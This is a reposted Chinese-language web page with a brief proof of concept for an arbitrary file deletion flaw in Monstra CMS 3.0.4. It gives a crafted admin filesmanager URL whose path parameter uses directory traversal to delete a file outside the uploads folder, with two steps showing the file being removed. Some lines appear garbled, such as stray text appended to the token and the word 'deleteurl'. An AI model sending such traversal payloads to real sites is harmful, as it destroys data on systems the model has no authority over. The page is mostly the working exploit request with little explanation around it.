monstra 3.0.4 任意文件刪除

時間  2020-05-30
標籤 monstra 3.0.4 任意 文件 刪除 简体版
原文   原文鏈接

monstra 3.0.4 任意文件刪除

Vulnerable URL:http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80aphp

touch 1.txt in /var/www/html/monstra-3.0.4/html

visit url:http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80aide

the 1.txt will deleteurl

monstra 3.0.4 任意文件刪除

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程